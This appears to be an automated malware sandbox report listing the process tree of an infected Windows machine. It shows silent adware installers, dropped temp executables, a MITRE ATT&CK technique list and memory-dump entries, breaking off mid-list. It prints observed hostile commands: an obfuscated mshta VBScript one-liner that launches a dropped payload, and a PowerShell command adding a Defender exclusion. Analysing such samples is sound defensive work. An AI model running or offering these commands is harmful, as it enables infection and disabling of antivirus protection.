        Suspicious use of FindShellTrayWindow
        
        PID:6984
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629319883 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
        10⤵
        
        PID:7224

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv mYJQsYoYr0OfiPEKVQoXYQ.0.2
1⤵
PID:4716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3684 -ip 3684
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3396 -ip 3396
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3104 -ip 3104
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 968 -ip 968
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:1344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2464 -ip 2464
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4576 -ip 4576
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4568 -ip 4568
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1296 -ip 1296
1⤵
PID:5116

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\_UerjZJjj9bHJwqYvhlNxovp.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\_UerjZJjj9bHJwqYvhlNxovp.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
1⤵
PID:6552
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\_UerjZJjj9bHJwqYvhlNxovp.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\_UerjZJjj9bHJwqYvhlNxovp.exe" ) do taskkill -f -iM "%~NxA"
  2⤵
  PID:3680
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -iM "_UerjZJjj9bHJwqYvhlNxovp.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4996 -ip 4996
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4704 -ip 4704
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5596

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 440 -p 4676 -ip 4676
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6644

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5664
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:1192
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1192 -s 448
    3⤵
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:6064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1192 -ip 1192
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:864

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:7164
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 4F77658B74BAC642F39407B9BC0F02FA C
  2⤵
  - Loads dropped DLL
  PID:7188
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding C38497F4FBBCDFF71B52010C3472D0A2 C
  2⤵
  PID:7360
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding BB87ADCFF9A4E79F0E5784302E62F153 C
  2⤵
  PID:1376
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 3ED9C26A3A00E0A14FB6F07942BC7FD5
  2⤵
  PID:7792
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 2DB31BCB190E2A4FD92A546328B1444E C
  2⤵
  PID:3020
- C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
  2⤵
  PID:8056
- - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
    3⤵
    PID:7088
  - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
      4⤵
      PID:1232
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1d0,0x210,0x7fffdbf4dec0,0x7fffdbf4ded0,0x7fffdbf4dee0
        5⤵
        
        PID:6108
      - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x140,0x144,0x148,0x11c,0x14c,0x7ff7e9339e70,0x7ff7e9339e80,0x7ff7e9339e90
        6⤵
        
        PID:2908
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,971844048748920872,4693938615461604135,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1232_464567845" --mojo-platform-channel-handle=1856 /prefetch:8
        5⤵
        
        PID:7280
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1580,971844048748920872,4693938615461604135,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1232_464567845" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1596 /prefetch:2
        5⤵
        
        PID:1560
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,971844048748920872,4693938615461604135,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1232_464567845" --mojo-platform-channel-handle=2236 /prefetch:8
        5⤵
        
        PID:7984
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,971844048748920872,4693938615461604135,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1232_464567845" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2448 /prefetch:1
        5⤵
        
        PID:5972
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,971844048748920872,4693938615461604135,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1232_464567845" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=1584 /prefetch:1
        5⤵
        
        PID:5240
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1580,971844048748920872,4693938615461604135,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1232_464567845" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3232 /prefetch:2
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4456
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,971844048748920872,4693938615461604135,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1232_464567845" --mojo-platform-channel-handle=3716 /prefetch:8
        5⤵
        
        PID:4296
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,971844048748920872,4693938615461604135,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1232_464567845" --mojo-platform-channel-handle=3504 /prefetch:8
        5⤵
        
        PID:2096
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,971844048748920872,4693938615461604135,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1232_464567845" --mojo-platform-channel-handle=3884 /prefetch:8
        5⤵
        
        PID:5716
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,971844048748920872,4693938615461604135,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1232_464567845" --mojo-platform-channel-handle=2312 /prefetch:8
        5⤵
        
        PID:3992
    - - C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
        
        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,971844048748920872,4693938615461604135,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1232_464567845" --mojo-platform-channel-handle=3860 /prefetch:8
        5⤵
        
        PID:5324
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_8E62.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
    3⤵
    PID:720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4000 -ip 4000
1⤵
PID:5968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 1684 -ip 1684
1⤵
PID:6548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 1068 -ip 1068
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 6856 -ip 6856
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 4916 -ip 4916
1⤵
PID:6148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4720 -ip 4720
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4456 -ip 4456
1⤵
PID:8152

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 444 -p 5584 -ip 5584
1⤵
PID:732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5564 -ip 5564
1⤵
PID:2660

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 572 -p 6396 -ip 6396
1⤵
PID:7112

C:\Users\Admin\AppData\Local\Temp\4513.exe
C:\Users\Admin\AppData\Local\Temp\4513.exe
1⤵
PID:8156

C:\Users\Admin\AppData\Local\Temp\682D.exe
C:\Users\Admin\AppData\Local\Temp\682D.exe
1⤵
PID:7664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3676 -ip 3676
1⤵
PID:7516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3032 -ip 3032
1⤵
PID:5228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
1⤵
PID:7240
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{5c959ca4-7bec-6648-b6ea-4d7b4d23bb1f}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:4844
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180" "1e17"
  2⤵
  PID:2092

C:\Users\Admin\AppData\Local\Temp\7117.exe
C:\Users\Admin\AppData\Local\Temp\7117.exe
1⤵
PID:5208
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5208 -s 304
  2⤵
  - Program crash
  PID:8152

C:\Users\Admin\AppData\Local\Temp\80A8.exe
C:\Users\Admin\AppData\Local\Temp\80A8.exe
1⤵
PID:6504
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6504 -s 280
  2⤵
  - Program crash
  PID:7524

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
1⤵
PID:2752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
1⤵
PID:5508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 5208 -ip 5208
1⤵
PID:4424

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 6504 -ip 6504
1⤵
PID:3220

C:\Users\Admin\AppData\Local\Temp\C40B.exe
C:\Users\Admin\AppData\Local\Temp\C40B.exe
1⤵
PID:5760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 5812 -ip 5812
1⤵
PID:6648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 5320 -ip 5320
1⤵
PID:6360

C:\Users\Admin\AppData\Local\Temp\F5BB.exe
C:\Users\Admin\AppData\Local\Temp\F5BB.exe
1⤵
PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3244 -ip 3244
1⤵
PID:7796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:7820

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:5704
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:3280

C:\Users\Admin\AppData\Local\Temp\3B8F.exe
C:\Users\Admin\AppData\Local\Temp\3B8F.exe
1⤵
PID:1664
- C:\Users\Admin\AppData\Local\Temp\3fcc3188-40e7-4078-b381-c29ab7986419\AdvancedRun.exe
  "C:\Users\Admin\AppData\Local\Temp\3fcc3188-40e7-4078-b381-c29ab7986419\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\3fcc3188-40e7-4078-b381-c29ab7986419\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
  2⤵
  PID:6616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3fcc3188-40e7-4078-b381-c29ab7986419\test.bat"
    3⤵
    PID:6476
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\3B8F.exe" -Force
  2⤵
  PID:8044
- C:\Users\Admin\AppData\Local\Temp\3B8F.exe
  C:\Users\Admin\AppData\Local\Temp\3B8F.exe
  2⤵
  PID:7120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
PID:2896

C:\Users\Admin\AppData\Local\Temp\62EE.exe
C:\Users\Admin\AppData\Local\Temp\62EE.exe
1⤵
PID:5796

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6484
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 888
  2⤵
  - Program crash
  PID:5832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 6484 -ip 6484
1⤵
PID:3332

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2588

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5100

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6676

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3856

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3860

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7960

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4308

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:6268

C:\Users\Admin\AppData\Local\Temp\EC19.exe
C:\Users\Admin\AppData\Local\Temp\EC19.exe
1⤵
PID:6284
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6284 -s 308
  2⤵
  - Program crash
  PID:7184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6284 -ip 6284
1⤵
PID:3528

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:6408

C:\Users\Admin\AppData\Local\Temp\447F.exe
C:\Users\Admin\AppData\Local\Temp\447F.exe
1⤵
PID:4928
- C:\Users\Admin\AppData\Local\Temp\MendacityTrizonal_2021-08-21_22-48.exe
  "C:\Users\Admin\AppData\Local\Temp\MendacityTrizonal_2021-08-21_22-48.exe"
  2⤵
  PID:2148
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 320
    3⤵
    - Program crash
    PID:2800
- C:\Users\Admin\AppData\Local\Temp\david.exe
  "C:\Users\Admin\AppData\Local\Temp\david.exe"
  2⤵
  PID:7504
- - C:\Users\Admin\AppData\Local\Temp\david.exe
    "{path}"
    3⤵
    PID:5696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2148 -ip 2148
1⤵
PID:7804

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/968-259-0x0000000003F90000-0x0000000003FC0000-memory.dmp

Filesize
192KB

Download
memory/1068-223-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1184-480-0x0000022076312000-0x0000022076314000-memory.dmp

Filesize
8KB

Download
memory/1184-459-0x0000022076310000-0x0000022076312000-memory.dmp

Filesize
8KB

Download
memory/1296-432-0x0000000004A30000-0x0000000004ACD000-memory.dmp

Filesize
628KB

Download
memory/1300-421-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1756-417-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2256-227-0x00000000007B0000-0x00000000007B3000-memory.dmp

Filesize
12KB

Download
memory/2344-257-0x00000000006B0000-0x00000000006B1000-memory.dmp

Filesize
4KB

Download
memory/2344-320-0x0000000003650000-0x0000000003651000-memory.dmp

Filesize
4KB

Download
memory/2428-411-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2464-253-0x0000000004130000-0x00000000041CD000-memory.dmp

Filesize
628KB

Download
memory/2800-425-0x0000000004B60000-0x0000000004B61000-memory.dmp

Filesize
4KB

Download
memory/3060-298-0x00000000037B0000-0x00000000037B1000-memory.dmp

Filesize
4KB

Download
memory/3060-243-0x0000000000BB0000-0x0000000000BB1000-memory.dmp

Filesize
4KB

Download
memory/3104-380-0x0000000002550000-0x000000000257F000-memory.dmp

Filesize
188KB

Download
memory/3108-287-0x0000000005AA0000-0x0000000005AA1000-memory.dmp

Filesize
4KB

Download
memory/3108-356-0x0000000005B20000-0x0000000005B21000-memory.dmp

Filesize
4KB

Download
memory/3108-261-0x0000000005A60000-0x0000000005A61000-memory.dmp

Filesize
4KB

Download
memory/3108-334-0x0000000005AE0000-0x0000000005AE1000-memory.dmp

Filesize
4KB

Download
memory/3108-272-0x0000000005A90000-0x0000000005A91000-memory.dmp

Filesize
4KB

Download
memory/3108-343-0x0000000005B00000-0x0000000005B01000-memory.dmp

Filesize
4KB

Download
memory/3108-354-0x0000000005B10000-0x0000000005B11000-memory.dmp

Filesize
4KB

Download
memory/3108-247-0x00000000031C0000-0x00000000031FC000-memory.dmp

Filesize
240KB

Download
memory/3108-360-0x0000000005B30000-0x0000000005B31000-memory.dmp

Filesize
4KB

Download
memory/3108-291-0x0000000005AB0000-0x0000000005AB1000-memory.dmp

Filesize
4KB

Download
memory/3108-335-0x0000000005AF0000-0x0000000005AF1000-memory.dmp

Filesize
4KB

Download
memory/3108-369-0x0000000005B40000-0x0000000005B41000-memory.dmp

Filesize
4KB

Download
memory/3108-256-0x0000000005A50000-0x0000000005A51000-memory.dmp

Filesize
4KB

Download
memory/3108-304-0x0000000005AC0000-0x0000000005AC1000-memory.dmp

Filesize
4KB

Download
memory/3108-249-0x00000000021B0000-0x00000000021B1000-memory.dmp

Filesize
4KB

Download
memory/3108-269-0x0000000005A80000-0x0000000005A81000-memory.dmp

Filesize
4KB

Download
memory/3108-330-0x0000000005AD0000-0x0000000005AD1000-memory.dmp

Filesize
4KB

Download
memory/3108-265-0x0000000005A70000-0x0000000005A71000-memory.dmp

Filesize
4KB

Download
memory/3108-378-0x0000000005B60000-0x0000000005B61000-memory.dmp

Filesize
4KB

Download
memory/3108-375-0x0000000005B50000-0x0000000005B51000-memory.dmp

Filesize
